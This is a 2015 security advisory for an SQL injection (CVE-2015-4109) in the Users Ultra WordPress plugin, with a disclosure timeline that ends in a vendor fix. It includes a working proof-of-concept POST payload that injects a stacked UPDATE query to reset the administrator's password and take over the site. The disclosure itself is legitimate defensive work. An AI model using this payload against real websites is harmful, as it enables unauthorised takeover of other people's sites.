Users Ultra [SQL injection]
WordPress plugin Users Ultra suffers for an SQL Injection vulnerability.
Description
One can perform an SQL injection attack simply by exploiting wp_ajax_nopriv_rating_vote
action. POST parameters data_target and data_vote can be used to execute arbitrary SQL commands in the database.
Proof of Concept
In the following PoC we change the administrators password to ‘1’ so a malicious user can then login as the administrator, taking full control of the website.
- Send a post request to
http://my.vulnerable.website.com/wp-admin/admin-ajax.php
with data:action=rating_vote&data_id=1&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1
- Login with administrator’s user name and password
1
Note that we assume that table name prefix is wp
and administrators user id is 1, a very common scenario.
INFO
- 29 May 2015
- Pan Vag
- usersultra.com
- wordpress.org
- 1.5.15
- WordPress 4.2.2
- CVE-2015-4109
TIMELINE
- 2015-05-29:
Discovered - 2015-05-30:
Vendor notified via contact form - 2015-06-01:
Vendor notified via support forums at wordpress.org - 2015-06-02:
Vendor responded - 2015-06-04:
Fix released in version 1.5.16